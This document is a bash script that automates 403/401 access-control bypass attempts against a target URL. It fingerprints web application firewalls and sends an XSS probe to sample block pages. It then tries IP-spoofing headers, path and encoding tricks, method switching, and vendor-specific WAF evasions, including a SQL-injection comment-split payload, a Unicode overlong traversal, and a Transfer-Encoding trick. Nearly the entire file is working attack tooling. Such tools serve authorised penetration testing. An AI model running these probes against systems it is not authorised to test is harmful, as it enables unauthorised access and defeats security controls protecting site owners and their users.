#!/bin/bash
# =============================================================================
# 403/401 Bypass Probe — try common header/method/encoding tricks against a URL
#
# Wraps byp4xx (lobuhi) when present. Falls back to a built-in matrix of the
# most-paid bypass techniques from disclosed reports so it works out of the box.
#
# Usage:
#   ./tools/bypass_403.sh <url>
#   ./tools/bypass_403.sh -l <urls-file>     # one URL per line, parallelised
# =============================================================================

set -uo pipefail

SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
. "$SCRIPT_DIR/external_arsenal.sh"

GREEN='\033[0;32m'; RED='\033[0;31m'; YELLOW='\033[1;33m'; CYAN='\033[0;36m'; MAG='\033[0;35m'; NC='\033[0m'
log()  { echo -e "${CYAN}[*]${NC} $1"; }
ok()   { echo -e "${GREEN}[+]${NC} $1"; }
hit()  { echo -e "${MAG}[BYPASS]${NC} $1"; }
err()  { echo -e "${RED}[-]${NC} $1" >&2; }

URL=""; LIST=""
while [ "$#" -gt 0 ]; do
  case "$1" in
    -l|--list) shift; LIST="${1:-}" ;;
    -h|--help) sed -n '2,10p' "$0"; exit 0 ;;
    *) URL="$1" ;;
  esac
  shift
done

[ -z "$URL" ] && [ -z "$LIST" ] && { err "url or -l <file> required"; exit 2; }

OUT_DIR="${BYPASS_OUT_DIR:-$(pwd)/findings/bypass/$(date +%Y%m%d_%H%M%S)}"
mkdir -p "$OUT_DIR"

# shellcheck source=banner.sh
. "$SCRIPT_DIR/banner.sh"
print_banner "403 / 401 Bypass Probe" "${URL:-$LIST}" \
    "byp4xx|full bypass matrix when installed" \
    "Built-in|header · method · path · encoding tricks" \
    "Report|matched response codes per technique"

if _have byp4xx; then
  log "byp4xx bypass matrix..."
  if [ -n "$URL" ]; then
    byp4xx -u "$URL" 2>/dev/null > "$OUT_DIR/byp4xx.txt" || true
  else
    byp4xx -L "$LIST" 2>/dev/null > "$OUT_DIR/byp4xx.txt" || true
  fi
  ok "byp4xx done — see $OUT_DIR/byp4xx.txt"
  exit 0
fi

# Built-in fallback — most common header / method / path tricks
_fingerprint_waf() {
  local target="$1"
  local hdrs body waf="unknown"
  hdrs=$(curl -sIk --max-time 6 "$target" 2>/dev/null)
  body=$(curl -sk --max-time 6 "$target" 2>/dev/null | head -c 4000)
  if _have wafw00f; then
    local w
    w=$(wafw00f "$target" 2>/dev/null | grep -Eo 'is behind .*' | head -1 || true)
    [ -n "$w" ] && waf="$w"
  fi
  echo "$hdrs" | grep -qi "cf-ray\|__cfduid\|cf-cache-status\|cf-request-id" && waf="cloudflare"
  echo "$hdrs" | grep -qi "x-amzn-requestid\|x-amzn-trace-id\|x-amz-cf-id" && waf="aws"
  echo "$hdrs" | grep -qi "akamai-x-\|akamaighost\|x-akamai" && waf="akamai"
  echo "$hdrs" | grep -qi "x-cdn: imperva\|x-iinfo" && waf="imperva"
  echo "$hdrs" | grep -qi "incap_ses\|visid_incap" && waf="imperva"
  echo "$hdrs" | grep -qEi "set-cookie:.*TS[0-9a-f]{6,}" && waf="f5-bigip"
  echo "$hdrs" | grep -qi "x-sucuri-id" && waf="sucuri"
  echo "$body" | grep -qi "mod_security\|ModSecurity\|NAXSI" && waf="modsecurity"
  printf '%s' "$waf"
}

# ---------------------------------------------------------------------------
# Block Baseline Sampling
# ---------------------------------------------------------------------------
_sample_block_baseline() {
  local target="$1"
  local host
  host=$(echo "$target" | grep -oE 'https?://[^/]+')
  local bb_body="$OUT_DIR/.block_baseline.body"
  local bb_len="$OUT_DIR/.block_baseline.len"
  [ -f "$bb_len" ] && return 0  # already sampled this run
  local probe_url="${host}/?_waftest=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
  touch "$bb_body"  # ensure file exists even if curl fails/times-out
  curl -sk --max-time 8 "$probe_url" -o "$bb_body" 2>/dev/null || true
  local len
  len=$(wc -c < "$bb_body" 2>/dev/null | tr -d ' ')
  printf '%s' "${len:-0}" > "$bb_len"
  log "block baseline: ${len:-0} bytes (from ${host}/?_waftest=...)"
}

# ---------------------------------------------------------------------------
# WAF Block Body Signatures (12 vendors + generic log-id pattern)
# ---------------------------------------------------------------------------
_WAF_BLOCK_REGEX='cf-challenge-form|Just a moment\.\.\.|Attention Required! \| Cloudflare|Sorry, you have been blocked|Cloudflare Ray ID:|Error 1020|_Incapsula_Resource|incident ID:|subject=WAF Block|iframe.*incident_id|AkamaiGHost|Reference #[0-9]|<AccessDenied>|Request blocked.*AWS|Generated by cloudfront|The requested URL was rejected|Please consult with your administrator|[Ss]upport ID:.*[0-9]{10}|mod_security|ModSecurity|Not Acceptable!|Sucuri WebSite Firewall|Powered by Fortinet|Attack ID:.*[0-9]|nginx-wallarm|Wallarm|Barracuda.*blocked|BNI__BARRACUDA'

_GENERIC_LOG_ID_REGEX='(reference|incident|support|log|trace|event|request|error)[[:space:]_-]*(id|number|#)[[:space:]:#]*[a-zA-Z0-9_-]{6,40}'

# ---------------------------------------------------------------------------
# Verdict: is this response a real bypass or still a WAF block?
# Returns 0 (true) = real bypass, 1 (false) = still blocked
# ---------------------------------------------------------------------------
_is_real_bypass() {
  local body_file="$1" code="$2" body_len="${3:-0}"
  # 1. Status must indicate backend was reached
  case "$code" in
    200|201|204|301|302|401|500|502|503) ;;
    *) return 1 ;;
  esac
  # 2. Body must not match any WAF block signature
  if grep -qiE "$_WAF_BLOCK_REGEX" "$body_file" 2>/dev/null; then
    return 1
  fi
  # 3. Body length must diverge from block baseline by >5%
  local bb_len
  bb_len=$(cat "$OUT_DIR/.block_baseline.len" 2>/dev/null || echo 0)
  if [ "$bb_len" -gt 50 ] && [ "$body_len" -gt 0 ]; then
    local diff
    diff=$(( body_len > bb_len ? body_len - bb_len : bb_len - body_len ))
    local threshold=$(( bb_len / 20 ))
    [ "$diff" -le "$threshold" ] && return 1
  fi
  return 0
}

# ---------------------------------------------------------------------------
# Extract WAF Log IDs from a body file — useful for report writing
# ---------------------------------------------------------------------------
_extract_log_ids() {
  local body_file="$1"
  local ids
  ids=$(grep -oiE "(CF-RAY[: ]+[0-9a-f]{16}-[A-Z]{3}|[Ss]upport[[:space:]_]?ID[: ]+[0-9]{10,}|[Ii]ncident[[:space:]_]?ID[: #]+[0-9]+-[0-9]+|Reference[[:space:]#]+[0-9a-f.]{15,}|x-amzn-RequestId[: ]+[a-f0-9-]{36}|\[id \"[0-9]{6}\"\])" "$body_file" 2>/dev/null | head -5 || true)
  [ -n "$ids" ] && printf '%s' "$ids"
}

# ---------------------------------------------------------------------------
# Optional: delegate classify to Python analyzer when available
# ---------------------------------------------------------------------------
_ANALYZER="$SCRIPT_DIR/waf_response_analyzer.py"
_classify_with_analyzer() {
  local body_file="$1" hdr_file="$2" code="$3" metrics="$4" baseline_json="$5"
  if [ -f "$_ANALYZER" ] && _have python3; then
    python3 "$_ANALYZER" \
      --classify \
      --status "$code" \
      --body "$body_file" \
      --headers "$hdr_file" \
      --baseline "$baseline_json" \
      --metrics "$metrics" \
      --format json 2>/dev/null || echo '{"verdict":"error","score":0,"reason":"analyzer error"}'
  else
    # fallback to bash logic
    local body_len
    body_len=$(echo "$metrics" | cut -d'|' -f2)
    if _is_real_bypass "$body_file" "$code" "$body_len"; then
      printf '{"verdict":"bypassed","score":70,"reason":"bash-fallback: status+body+length check passed"}'
    else
      printf '{"verdict":"blocked","score":20,"reason":"bash-fallback: status/body/length check failed"}'
    fi
  fi
}

_probe_one() {
  local target="$1" found=0
  local base="${target%/*}"      # strip last segment
  local last="${target##*/}"
  local waf
  waf=$(_fingerprint_waf "$target")
  log "WAF fingerprint: $waf"
  echo "target=$target waf=$waf" >> "$OUT_DIR/waf_fingerprint.txt"
  _sample_block_baseline "$target"
  local baseline_json="$OUT_DIR/.block_baseline.json"
  if [ -f "$_ANALYZER" ] && _have python3; then
    local _origin
    _origin=$(printf '%s' "$target" | grep -oE 'https?://[^/]+')
    python3 "$_ANALYZER" --calibrate "$_origin" --output "$baseline_json" --quiet 2>/dev/null || true
  fi
  log "probing $target"

  for combo in \
    "GET|$target|X-Original-URL: $target" \
    "GET|$target|X-Rewrite-URL: $target" \
    "GET|$target|X-Forwarded-For: 127.0.0.1" \
    "GET|$target|X-Forwarded-Host: localhost" \
    "GET|$target|X-Custom-IP-Authorization: 127.0.0.1" \
    "GET|$target|X-Client-IP: 127.0.0.1" \
    "GET|$target|X-Host: localhost" \
    "GET|${base}/%2e/${last}|" \
    "GET|${base}/.${last}|" \
    "GET|${base}/${last}/|" \
    "GET|${base}/${last}/.|" \
    "GET|${base}/${last};/|" \
    "GET|${base}/${last}..;/|" \
    "GET|${base}/${last}.json|" \
    "GET|${base}/${last}#|" \
    "POST|$target|" \
    "PUT|$target|" \
    "PATCH|$target|" \
    "TRACE|$target|" \
    "GET|$target|True-Client-IP: 127.0.0.1" \
    "GET|$target|CF-Connecting-IP: 127.0.0.1" \
    "GET|$target|X-Originating-IP: 127.0.0.1" \
    "GET|$target|X-ProxyUser-Ip: 127.0.0.1" \
    "GET|$target|Client-IP: 127.0.0.1" \
    "GET|$target|Forwarded: for=127.0.0.1" \
    "GET|$target|X-Remote-Addr: 127.0.0.1" \
    "GET|$target|X-Remote-IP: 127.0.0.1" \
    "GET|$target|Via: 1.1 127.0.0.1" \
    "GET|$target|X-HTTP-Method-Override: GET" \
    "GET|${base}/%252e/${last}|" \
    "GET|${base}/${last}%20|" \
    "GET|${base}/${last}%09|" \
    "GET|${base}/${last}.html|" \
    "GET|${base}/${last}.css|" \
    "GET|${base}//${last}|" \
    "GET|${base}/./${last}|" \
    "POST|$target|Content-Type: application/json" \
    "POST|$target|Content-Type: multipart/form-data; boundary=x" ; do
    method=$(echo "$combo" | cut -d'|' -f1)
    url=$(echo "$combo" | cut -d'|' -f2)
    hdr=$(echo "$combo" | cut -d'|' -f3)
    local _tmpbody _tmphdr
    _tmpbody=$(mktemp)
    _tmphdr=$(mktemp)
    local _args=( -sk -D "$_tmphdr" -o "$_tmpbody" -w "%{http_code}|%{size_download}|%{time_total}" --max-time 5 -X "$method" )
    [ -n "$hdr" ] && _args+=( -H "$hdr" )
    local _result
    _result=$(curl "${_args[@]}" "$url" 2>/dev/null || echo "0|0|0")
    code="${_result%%|*}"
    local _body_len
    _body_len=$(printf '%s' "$_result" | cut -d'|' -f2)
    local _verdict_json
    _verdict_json=$(_classify_with_analyzer "$_tmpbody" "$_tmphdr" "$code" "$_result" "$baseline_json")
    local _verdict
    _verdict=$(printf '%s' "$_verdict_json" | grep -oE '"verdict":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
    local _log_ids
    _log_ids=$(_extract_log_ids "$_tmpbody")
    case "$_verdict" in
      bypassed)
        local _reason
        _reason=$(printf '%s' "$_verdict_json" | grep -oE '"reason":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
        hit "$method  $url  $hdr  → HTTP $code (${_body_len}B) [${_reason}]"
        [ -n "$_log_ids" ] && log "  WAF Log IDs: $_log_ids"
        echo "$method|$url|$hdr|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_hits.txt"
        found=1
        ;;
      needs_review)
        echo -e "${YELLOW}[?]${NC} $method  $url  $hdr  → HTTP $code (${_body_len}B) — uncertain"
        echo "$method|$url|$hdr|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_uncertain.txt"
        ;;
      blocked)
        echo "$method|$url|$hdr|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_blocked.txt"
        ;;
    esac
    rm -f "$_tmpbody" "$_tmphdr"
  done
  # Vendor-specific bypass based on fingerprint
  case "$waf" in
    cloudflare)
      log "cloudflare: trying TE+X-Forwarded-Host..."
      local _tmpbody; _tmpbody=$(mktemp)
      local _tmphdr; _tmphdr=$(mktemp)
      local _res
      _res=$(curl -sk -D "$_tmphdr" -o "$_tmpbody" -w "%{http_code}|%{size_download}|%{time_total}" --max-time 6 \
        -H "Transfer-Encoding: chunked" -H "X-Forwarded-Host: localhost" \
        "$target" 2>/dev/null || echo "0|0|0")
      code="${_res%%|*}"
      local _body_len; _body_len=$(printf '%s' "$_res" | cut -d'|' -f2)
      local _verdict_json
      _verdict_json=$(_classify_with_analyzer "$_tmpbody" "$_tmphdr" "$code" "$_res" "$baseline_json")
      local _verdict
      _verdict=$(printf '%s' "$_verdict_json" | grep -oE '"verdict":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      local _reason
      _reason=$(printf '%s' "$_verdict_json" | grep -oE '"reason":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      case "$_verdict" in
        bypassed)
          hit "cloudflare TE+XFH → $code (${_body_len}B) [${_reason}]"
          echo "CF-TE+XFH|$target|vendor-cloudflare|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_hits.txt"; found=1 ;;
        needs_review)
          echo -e "${YELLOW}[?]${NC} cloudflare TE+XFH → $code (${_body_len}B) — uncertain"
          echo "CF-TE+XFH|$target|vendor-cloudflare|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_uncertain.txt" ;;
        blocked)
          echo "CF-TE+XFH|$target|vendor-cloudflare|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_blocked.txt" ;;
      esac
      rm -f "$_tmpbody" "$_tmphdr"
      ;;
    aws)
      log "aws: trying comment-splitting on param..."
      local _tmpbody; _tmpbody=$(mktemp)
      local _tmphdr; _tmphdr=$(mktemp)
      local _res
      _res=$(curl -sk -D "$_tmphdr" -o "$_tmpbody" -w "%{http_code}|%{size_download}|%{time_total}" --max-time 6 \
        "${target}?id=1/**/AND/**/1=1" 2>/dev/null || echo "0|0|0")
      code="${_res%%|*}"
      local _body_len; _body_len=$(printf '%s' "$_res" | cut -d'|' -f2)
      local _verdict_json
      _verdict_json=$(_classify_with_analyzer "$_tmpbody" "$_tmphdr" "$code" "$_res" "$baseline_json")
      local _verdict
      _verdict=$(printf '%s' "$_verdict_json" | grep -oE '"verdict":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      local _reason
      _reason=$(printf '%s' "$_verdict_json" | grep -oE '"reason":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      case "$_verdict" in
        bypassed)
          hit "aws comment-split → $code (${_body_len}B) [${_reason}]"
          echo "AWS-comment|$target|vendor-aws|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_hits.txt"; found=1 ;;
        needs_review)
          echo -e "${YELLOW}[?]${NC} aws comment-split → $code (${_body_len}B) — uncertain"
          echo "AWS-comment|$target|vendor-aws|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_uncertain.txt" ;;
        blocked)
          echo "AWS-comment|$target|vendor-aws|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_blocked.txt" ;;
      esac
      rm -f "$_tmpbody" "$_tmphdr"
      ;;
    imperva)
      log "imperva: trying unicode overlong..."
      local _tmpbody; _tmpbody=$(mktemp)
      local _tmphdr; _tmphdr=$(mktemp)
      local _res
      _res=$(curl -sk -D "$_tmphdr" -o "$_tmpbody" -w "%{http_code}|%{size_download}|%{time_total}" --max-time 6 \
        "${base}/%c0%2e%c0%2e/${last}" 2>/dev/null || echo "0|0|0")
      code="${_res%%|*}"
      local _body_len; _body_len=$(printf '%s' "$_res" | cut -d'|' -f2)
      local _verdict_json
      _verdict_json=$(_classify_with_analyzer "$_tmpbody" "$_tmphdr" "$code" "$_res" "$baseline_json")
      local _verdict
      _verdict=$(printf '%s' "$_verdict_json" | grep -oE '"verdict":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      local _reason
      _reason=$(printf '%s' "$_verdict_json" | grep -oE '"reason":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      case "$_verdict" in
        bypassed)
          hit "imperva unicode overlong → $code (${_body_len}B) [${_reason}]"
          echo "IMPERVA-unicode|$target|vendor-imperva|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_hits.txt"; found=1 ;;
        needs_review)
          echo -e "${YELLOW}[?]${NC} imperva unicode overlong → $code (${_body_len}B) — uncertain"
          echo "IMPERVA-unicode|$target|vendor-imperva|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_uncertain.txt" ;;
        blocked)
          echo "IMPERVA-unicode|$target|vendor-imperva|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_blocked.txt" ;;
      esac
      rm -f "$_tmpbody" "$_tmphdr"
      ;;
    f5-bigip)
      log "f5: trying path normalisation bypass..."
      local _tmpbody; _tmpbody=$(mktemp)
      local _tmphdr; _tmphdr=$(mktemp)
      local _res
      _res=$(curl -sk -D "$_tmphdr" -o "$_tmpbody" -w "%{http_code}|%{size_download}|%{time_total}" --max-time 6 \
        "${base}/%2f%2f${last}" 2>/dev/null || echo "0|0|0")
      code="${_res%%|*}"
      local _body_len; _body_len=$(printf '%s' "$_res" | cut -d'|' -f2)
      local _verdict_json
      _verdict_json=$(_classify_with_analyzer "$_tmpbody" "$_tmphdr" "$code" "$_res" "$baseline_json")
      local _verdict
      _verdict=$(printf '%s' "$_verdict_json" | grep -oE '"verdict":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      local _reason
      _reason=$(printf '%s' "$_verdict_json" | grep -oE '"reason":[[:space:]]*"[^"]*"' | grep -oE '"[^"]*"$' | tr -d '"')
      case "$_verdict" in
        bypassed)
          hit "f5-bigip double-slash → $code (${_body_len}B) [${_reason}]"
          echo "F5-doubleslash|$target|vendor-f5-bigip|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_hits.txt"; found=1 ;;
        needs_review)
          echo -e "${YELLOW}[?]${NC} f5-bigip double-slash → $code (${_body_len}B) — uncertain"
          echo "F5-doubleslash|$target|vendor-f5-bigip|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_uncertain.txt" ;;
        blocked)
          echo "F5-doubleslash|$target|vendor-f5-bigip|$code|$_body_len|$_verdict_json" >> "$OUT_DIR/bypass_blocked.txt" ;;
      esac
      rm -f "$_tmpbody" "$_tmphdr"
      ;;
  esac
  [ "$found" = "0" ] && ok "no bypass on $target"
}

if [ -n "$URL" ]; then
  _probe_one "$URL"
else
  while IFS= read -r u; do
    [ -z "$u" ] && continue
    _probe_one "$u"
  done < "$LIST"
fi

log "Output written to: $OUT_DIR"
[ -f "$OUT_DIR/bypass_hits.txt" ]     && ok  "bypass_hits.txt:     $(wc -l < "$OUT_DIR/bypass_hits.txt") confirmed bypass(es)"
[ -f "$OUT_DIR/bypass_uncertain.txt" ] && log "bypass_uncertain.txt: $(wc -l < "$OUT_DIR/bypass_uncertain.txt") needs review (200 body may still be block page)"
[ -f "$OUT_DIR/bypass_blocked.txt" ]  && log "Confirmed blocked: $(wc -l < "$OUT_DIR/bypass_blocked.txt") probe(s) → $OUT_DIR/bypass_blocked.txt"
[ -f "$OUT_DIR/waf_fingerprint.txt" ] && log "waf_fingerprint.txt:  $(cat "$OUT_DIR/waf_fingerprint.txt")"
